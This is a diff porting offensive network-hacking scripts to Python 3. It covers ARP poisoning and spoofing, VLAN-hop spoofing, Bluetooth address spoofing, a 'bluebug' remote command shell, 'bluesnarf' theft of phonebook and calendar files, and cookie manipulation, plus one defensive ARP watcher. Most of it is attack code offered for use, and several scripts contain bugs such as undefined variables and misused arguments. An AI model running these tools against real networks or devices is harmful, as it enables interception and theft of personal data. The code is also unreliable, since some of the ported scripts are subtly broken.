second edition (python3)

.gitmodules

@@ -0,0 +1,3 @@
+[submodule "krackattacks-scripts"]
+	path = krackattack
+	url = https://github.com/vanhoefm/krackattacks-scripts

arp-poison.py

@@ -1,11 +1,11 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 
 import sys
 from scapy.all import sniff, sendp, ARP, Ether
 
 
 if len(sys.argv) < 2:
-    print sys.argv[0] + " <iface>"
+    print(sys.argv[0] + " <iface>")
     sys.exit(0)
 
 
@@ -18,8 +18,8 @@ def arp_poison_callback(packet):
         answer[ARP].psrc = packet[ARP].pdst
         answer[ARP].pdst = packet[ARP].psrc
 
-        print "Fooling " + packet[ARP].psrc + " that " + \
-              packet[ARP].pdst + " is me"
+        print("Fooling " + packet[ARP].psrc + " that " + \
+              packet[ARP].pdst + " is me")
 
         sendp(answer, iface=sys.argv[1])
 

arp-spoof-vlan-hop.py

@@ -1,9 +1,9 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 
 import time
 from scapy.all import sendp, ARP, Ether, Dot1Q
 
-iface = "eth0"
+iface = "enp3s0f1"
 target_ip = '192.168.13.23'
 fake_ip = '192.168.13.5'
 fake_mac = 'c0:d3:de:ad:be:ef'

arp-spoof.py

@@ -1,14 +1,14 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 
 import sys
 import time
 from scapy.all import sendp, ARP, Ether
 
 if len(sys.argv) < 3:
-    print sys.argv[0] + ": <target> <spoof_ip>"
+    print(sys.argv[0] + ": <target> <spoof_ip>")
     sys.exit(1)
 
-iface = "eth0"
+iface = "wlp2s0"
 target_ip = sys.argv[1]
 fake_ip = sys.argv[2]
 
@@ -20,4 +20,4 @@
 
 while True:
     sendp(packet, iface=iface)
-    time.sleep(10)
+    time.sleep(1)

arp-watcher.py

@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 
 from scapy.all import sniff, ARP
 from signal import signal, SIGINT
@@ -9,52 +9,53 @@
 
 # Save ARP table on shutdown
 def sig_int_handler(signum, frame):
-    print "Got SIGINT. Saving ARP database..."
+    print("Got SIGINT. Saving ARP database...")
     try:
         f = open(arp_watcher_db_file, "w")
 
         for (ip, mac) in ip_mac.items():
             f.write(ip + " " + mac + "\n")
 
         f.close()
-        print "Done."
+        print("Done.")
     except IOError:
-        print "Cannot write file " + arp_watcher_db_file
-        sys.exit(1)
+        print("Cannot write file " + arp_watcher_db_file)
+
+    sys.exit(1)
 
 
 def watch_arp(pkt):
     # got is-at pkt (ARP response)
     if pkt[ARP].op == 2:
-        print pkt[ARP].hwsrc + " " + pkt[ARP].psrc
+        print(pkt[ARP].hwsrc + " " + pkt[ARP].psrc)
 
         # Device is new. Remember it.
         if ip_mac.get(pkt[ARP].psrc) == None:
-            print "Found new device " + \
+            print("Found new device " + \
                    pkt[ARP].hwsrc + " " + \
-                   pkt[ARP].psrc
+                   pkt[ARP].psrc)
             ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
 
         # Device is known but has a different IP
         elif ip_mac.get(pkt[ARP].psrc) and \
              ip_mac[pkt[ARP].psrc] != pkt[ARP].hwsrc:
-                print pkt[ARP].hwsrc + \
+                print(pkt[ARP].hwsrc + \
                       " has got new ip " + \
                       pkt[ARP].psrc + \
-                      " (old " + ip_mac[pkt[ARP].psrc] + ")"
+                      " (old " + ip_mac[pkt[ARP].psrc] + ")")
                 ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
 
 
 signal(SIGINT, sig_int_handler)
 
 if len(sys.argv) < 2:
-    print sys.argv[0] + " <iface>"
+    print(sys.argv[0] + " <iface>")
     sys.exit(0)
 
 try:
     fh = open(arp_watcher_db_file, "r")
 except IOError:
-    print "Cannot read file " + arp_watcher_db_file
+    print("Cannot read file " + arp_watcher_db_file)
     sys.exit(1)
 
 for line in fh:

bdaddr.py

@@ -1,41 +1,44 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 
 import sys
 import struct
 import bluetooth._bluetooth as bt
+import codecs
 
 if len(sys.argv) < 2:
-    print sys.argv[0] + " <bdaddr>"
+    print(sys.argv[0] + " <bdaddr>")
     sys.exit(1)
 
 # Split bluetooth address into it's bytes
 baddr = sys.argv[1].split(":")
 
 # Open hci socket
-sock = bt.hci_open_dev(0)
+sock = bt.hci_open_dev(1)
 
 # CSR vendor command to change address
-cmd = [ "\xc2", "\x02", "\x00", "\x0c", "\x00", "\x11",
-        "\x47", "\x03", "\x70", "\x00", "\x00", "\x01",
-        "\x00", "\x04", "\x00", "\x00", "\x00", "\x00",
-        "\x00", "\x00", "\x00", "\x00", "\x00", "\x00",
-        "\x00" ]
+cmd = [ b"\xc2", b"\x02", b"\x00", b"\x0c", b"\x00", b"\x11",
+        b"\x47", b"\x03", b"\x70", b"\x00", b"\x00", b"\x01",
+        b"\x00", b"\x04", b"\x00", b"\x00", b"\x00", b"\x00",
+        b"\x00", b"\x00", b"\x00", b"\x00", b"\x00", b"\x00",
+        b"\x00" ]
 
 # Set new addr in hex
-cmd[17] = baddr[3].decode("hex")
-cmd[19] = baddr[5].decode("hex")
-cmd[20] = baddr[4].decode("hex")
-cmd[21] = baddr[2].decode("hex")
-cmd[23] = baddr[1].decode("hex")
-cmd[24] = baddr[0].decode("hex")
+decode_hex = codecs.getdecoder("hex_codec")
+
+cmd[17] = decode_hex(baddr[3])[0]
+cmd[19] = decode_hex(baddr[5])[0]
+cmd[20] = decode_hex(baddr[4])[0]
+cmd[21] = decode_hex(baddr[2])[0]
+cmd[23] = decode_hex(baddr[1])[0]
+cmd[24] = decode_hex(baddr[0])[0]
 
 # Send HCI request
 bt.hci_send_req(sock,
                 bt.OGF_VENDOR_CMD,
                 0,
                 bt.EVT_VENDOR,
                 2000,
-                "".join(cmd))
+                b"".join(cmd))
 
 sock.close()
-print "Dont forget to reset your device"
+print("Dont forget to reset your device")

ble-beacon-scanner.py

@@ -0,0 +1,15 @@
+#!/usr/bin/python3
+
+from bluetooth.ble import BeaconService
+
+service = BeaconService()
+devices = service.scan(10)
+
+for addr, data in devices.items():
+    print("%s (UUID %s Major %d Minor %d Power %d RSSI %d)" % (addr,
+                                                               data[0],
+                                                               data[1],
+                                                               data[2],
+                                                               data[3],
+                                                               data[4]))
+

ble-gatt-service-discovery.py

@@ -0,0 +1,13 @@
+#!/usr/bin/python3
+
+from gattlib import GATTRequester
+import sys
+
+if len(sys.argv) < 2:
+    print("Usage: " + sys.argv[0] + " <addr>")
+    sys.exit(0)
+
+req = GATTRequester(sys.argv[1], True)
+
+for service in requester.discover_primary():
+    print(service)

ble-scanner.py

@@ -0,0 +1,10 @@
+#!/usr/bin/python3
+
+from bluetooth.ble import DiscoveryService
+
+service = DiscoveryService()
+devices = service.discover(2)
+
+for addr, name in devices.items():
+    print("Found %s (%s)" % (name, addr))
+

bluebug.py

@@ -1,21 +1,21 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 
 import sys
-import lightblue
+import bluetooth as bt
 
 if len(sys.argv) < 2:
-    print sys.argv[0] + " <btaddr> <channel>"
+    print(sys.argv[0] + " <btaddr> <channel>")
     sys.exit(0)
 
 btaddr = sys.argv[1]
 channel = int(sys.argv[2]) or 17
 running = True
 
-sock = lightblue.socket()
+sock = bt.BluetoothSocket(bt.RFCOMM)
 sock.connect((sys.argv[1], channel))
 
 while running:
-    cmd = raw_input(">>> ")
+    cmd = input(">>> ")
 
     if cmd == "quit" or cmd == "exit":
         running = False

bluesnarf.py

@@ -1,28 +1,47 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 
 import sys
 from os.path import basename
-from lightblue.obex import OBEXClient
+from PyOBEX import client, headers, responses
 
 
+def get_file(client, filename):
+    """
+    Use OBEX get to retrieve a file and write it
+    to a local file of the same name
+    """
+    r = client.get(filename)
+
+    if isinstance(r, responses.FailureResponse):
+        print("Failed to get file " + filename)
+    else:
+        headers, data = r
+
+        fh = open(filename, "w+")
+        fh.write(data)
+        fh.close()
+
+
 if len(sys.argv) < 3:
-    print sys.argv[0] + ": <btaddr> <channel>"
+    print(sys.argv[0] + ": <btaddr> <channel>")
     sys.exit(0)
 
 btaddr = sys.argv[1]
 channel = int(sys.argv[2])
 
-print "Bluesnarfing %s on channel %d" % (btaddr, channel)
-
-obex = OBEXClient(btaddr, channel)
-obex.connect()
+print("Bluesnarfing %s on channel %d" % (btaddr, channel))
 
-fh = file("calendar.vcs", "w+")
-obex.get({"name": "telecom/cal.vcs"}, fh)
-fh.close()
+c = client.BrowserClient(btaddr, channel)
+
+try:
+    r = c.connect()
+except OSError as e:
+    print("Connect failed. " + str(e))
 
-fh = file("phonebook.vcf", "w+")
-obex.get({"name": "telecom/pb.vcf"}, fh)
-fh.close()
+if isinstance(r, responses.ConnectSuccess):
+    c.setpath("telecom")
+
+    get_file(c, "cal.vcs")
+    get_file(c, "pb.vcf")
 
-obex.disconnect()
+    c.disconnect()

bluetooth-scanner.py

@@ -1,6 +1,7 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 
-import lightblue
+import bluetooth as bt
+
+for (addr, name) in bt.discover_devices(lookup_names=True):
+    print("%s %s" % (addr, name))
 
-for device in lightblue.finddevices():
-    print device[0] + " " + device[1]

command-injection.py

@@ -1,11 +1,11 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 
 ###[ Loading modules
 
 import sys
-import httplib2
-from urlparse import urlparse
-from BeautifulSoup import BeautifulSoup
+import requests
+from bs4 import BeautifulSoup
+from urllib.parse import urlparse
 
 
 ###[ Global vars
@@ -21,4 +21,4 @@
     "permission denied",
 ]
 
-# ...
+# ...

cookie-manipulator.py

@@ -1,15 +1,13 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 
 import sys
-import httplib2
+import requests
 
 if len(sys.argv) < 3:
-    print sys.argv[0] + ": &lt;url&gt; <key> <value>"
+    print(sys.argv[0] + ": <url> <key> <value>")
     sys.exit(1)
 
-webclient = httplib2.Http()
 headers = {'Cookie': sys.argv[2] + '=' + sys.argv[3]}
-response, content = webclient.request(sys.argv[1],
-                                      'GET',
-                                      headers=headers)
-print content
+r = requests.get(sys.argv[1], data=headers)
+
+print(r.content)